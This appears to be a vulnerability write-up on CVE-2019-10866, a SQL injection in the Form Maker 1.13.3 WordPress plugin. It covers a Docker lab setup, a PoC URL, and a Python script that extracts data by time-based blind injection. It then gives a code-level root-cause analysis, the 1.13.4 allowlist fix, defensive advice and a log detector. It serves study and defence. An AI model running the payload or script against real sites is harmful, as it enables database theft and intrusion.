Form Maker 1.13.3 SQL Injection Analysis (CVE-2019-10866)
Word count: 1230 | 2025-08-27 12:33:31

Form Maker 1.13.3 SQL Injection Vulnerability Analysis (CVE-2019-10866): Tutorial

1. Vulnerability Overview

Form Maker is a form-builder plugin for WordPress. Version 1.13.3 contains a SQL injection vulnerability (CVE-2019-10866): user input is concatenated into the ORDER BY clause of a query, which allows an attacker to execute arbitrary SQL statements through a specially crafted request.

2. Setting Up the Vulnerable Environment

2.1 Base Environment

  • Build a LAMP environment (PHP 7.0) with Docker
  • Install the xdebug debugging extension

2.2 Configuration Files

Dockerfile:

FROM medicean/vulapps:base_lamp_php7
RUN pecl install xdebug
COPY php.ini /etc/php/7.0/apache2/
COPY php.ini /etc/php/7.0/cli/

docker-compose.yml:

version: '3'
services:
  lamp-php7:
    build: .
    ports:
      - "80:80"
    volumes:
      - "/path/to/html:/var/www/html"
      - "/path/to/tmp:/tmp"

xdebug configuration in php.ini:

[xdebug]
zend_extension="/usr/lib/php/20151012/xdebug.so"
xdebug.remote_enable=1
xdebug.remote_host=10.254.254.254
xdebug.remote_port=9000
xdebug.remote_connect_back=0
xdebug.profiler_enable=0
xdebug.idekey=PHPSTORM
xdebug.remote_log="/tmp/xdebug.log"

2.3 Plugin Installation

  • WordPress version: 5.2.2
  • Form Maker plugin version: 1.13.3
  • Download: https://downloads.wordpress.org/plugin/form-maker.1.13.3.zip

3. Exploitation

3.1 PoC

http://127.0.0.1/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc=,(case+when+(select+ascii(substring(user(),1,1)))%3d114+then+(select+sleep(5)+from+wp_users+limit+1)+else+2+end)+asc%3b

3.2 Python Exploit Script

import requests
import time

# Target URL with the injectable asc_or_desc parameter left empty; the payload is appended per request.
vul_url = "http://127.0.0.1/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc="
S = requests.Session()
S.headers.update({
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,en;q=0.8,zh;q=0.5,en-US;q=0.3",
    "Referer": "http://127.0.0.1/wp-login.php?loggedout=true",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
})
TIME = 3  # sleep() delay in seconds that marks a correct guess
username = "admin"
password = "admin"

def login(username, password):
    # The submissions page is admin-only, so the script authenticates to WordPress first.
    data = {
        "log": username,
        "pwd": password,
        "wp-submit": "登录",  # label of the login button
        "redirect_to": "http://127.0.0.1/wp-admin/",
        "testcookie": "1",
    }
    S.post('http://127.0.0.1/wp-login.php', data=data, cookies={"wordpress_test_cookie": "WP+Cookie+check"})

def attack():
    # Time-based blind extraction of user(): one request per candidate byte; a response
    # delayed by at least TIME seconds means the CASE branch containing sleep() was taken.
    flag = True
    data = ""
    length = 1
    while flag:
        flag = False
        tmp_ascii = 0
        for code in range(32, 127):
            tmp_ascii = code
            start_time = time.time()
            payload = "{vul_url},(case+when+(select+ascii(substring(user(),{length},1)))%3d{code}+then+(select+sleep({TIME})+from+wp_users+limit+1)+else+2+end)+asc%3b".format(vul_url=vul_url, code=code, TIME=TIME, length=length)
            S.get(payload)
            tmp = time.time() - start_time
            if tmp >= TIME:
                flag = True
                break
        if flag:
            data += chr(tmp_ascii)
            length += 1
        print(data)

login(username, password)
attack()

4. Vulnerability Analysis

4.1 Trigger Flow

  1. The request carries the parameters page=submissions_fm&task=display
  2. form-maker.php instantiates FMControllerSubmissions_fm and calls its execute() method
  3. Submissions_fm.php dynamically dispatches to the display method
  4. Execution enters the get_labels_parameters method of the FMModelSubmissions_fm class
  5. The asc_or_desc parameter is read; only backslashes are stripped and &, <, >, " and ' are HTML-escaped
  6. When $order_by == 'group_id', $asc_or_desc is appended to the $orderby variable
  7. The SQL statement finally executed contains: ORDER BY group_id ,(case when (select ascii(substring(user(),1,1)))=114 then (select sleep(5) from wp_users limit 1) else 2 end) asc

4.2 Key Code Analysis

Vulnerable location: wp-content/plugins/form-maker/admin/models/Submissions_fm.php

// Read the asc_or_desc parameter
$asc_or_desc = WDW_FM_Library::get('asc_or_desc');

// Concatenate it into the SQL statement
if ($order_by == 'group_id') {
  $orderby .= $asc_or_desc;
}

Parameter filtering: wp-content/plugins/form-maker/framework/WDW_FM_Library.php

public static function get($key, $default_value = '', $esc_html = true) {
  $value = isset($_GET[$key]) ? $_GET[$key] : $default_value;
  return self::validate_data($value, $default_value, $esc_html);
}

private static function validate_data($value, $default_value, $esc_html) {
  $value = stripslashes($value);
  if ($esc_html) {
    $value = esc_html($value);
  }
  return $value;
}

5. Fix

In version 1.13.4 the fix restricts the value of asc_or_desc to desc or asc:

$asc_or_desc = WDW_FM_Library::get('asc_or_desc');
if (!in_array(strtolower($asc_or_desc), array('desc', 'asc'))) {
  $asc_or_desc = '';
}

6. Defensive Recommendations

  1. Strictly filter and validate all user input
  2. Use parameterized queries or prepared statements
  3. Minimize the privileges of the database user
  4. Keep plugins updated to the latest version
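As an added example (not code from the original post or from the plugin), the allowlist check behind the 1.13.4 fix in sections 5 and 6, re-expressed in Python, together with a detector that applies the same check to web-server access logs: any submissions_fm request whose asc_or_desc or order_by value falls outside the allowlist is flagged. The log lines are constructed for illustration, and the column allowlist is an assumption, since the page only names group_id.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Sort directions accepted by the Form Maker 1.13.4 fix (compared case-insensitively).
ALLOWED_DIRECTIONS = {"asc", "desc"}
# Sortable columns: an assumed allowlist, since the page only names group_id.
ALLOWED_COLUMNS = {"group_id", "id", "date"}

def safe_order_clause(order_by, asc_or_desc):
    """Build the ORDER BY clause from untrusted input using allowlists only.

    Mirrors the 1.13.4 fix: a value outside the allowlist is replaced, not escaped,
    because esc_html() is HTML-context escaping and cannot protect an ORDER BY clause,
    and column names and sort directions cannot be bound as prepared-statement parameters.
    """
    column = order_by if order_by in ALLOWED_COLUMNS else "group_id"
    direction = asc_or_desc.lower() if asc_or_desc.lower() in ALLOWED_DIRECTIONS else "asc"
    return f"ORDER BY {column} {direction}"

# Constructed Apache combined-format log lines (not real traffic): one benign request,
# one carrying the time-based payload shown in section 3.1.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Aug/2025:12:33:31 +0000] "GET /wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc=desc HTTP/1.1" 200 5120
10.0.0.9 - - [27/Aug/2025:12:34:02 +0000] "GET /wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc=,(case+when+(select+ascii(substring(user(),1,1)))%3d114+then+(select+sleep(5)+from+wp_users+limit+1)+else+2+end)+asc%3b HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

def find_suspicious_requests(log_text):
    """Return (ip, timestamp, parameter, decoded value) for every submissions_fm
    request whose sort parameters would fail the allowlist check above."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns '+' into spaces, so the payload is inspected decoded.
        params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
        if params.get("page") != ["submissions_fm"]:
            continue
        for name, allowed in (("asc_or_desc", ALLOWED_DIRECTIONS), ("order_by", ALLOWED_COLUMNS)):
            for value in params.get(name, []):
                if value and value.lower() not in allowed:
                    hits.append((m["ip"], m["ts"], name, value))
    return hits
```

Running find_suspicious_requests(SAMPLE_LOG) reports only the second request, with the asc_or_desc payload decoded to the CASE/sleep() expression seen in the trigger flow of section 4.1.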

7. References

  1. https://www.exploit-db.com/exploits/46958
  2. https://developer.wordpress.org/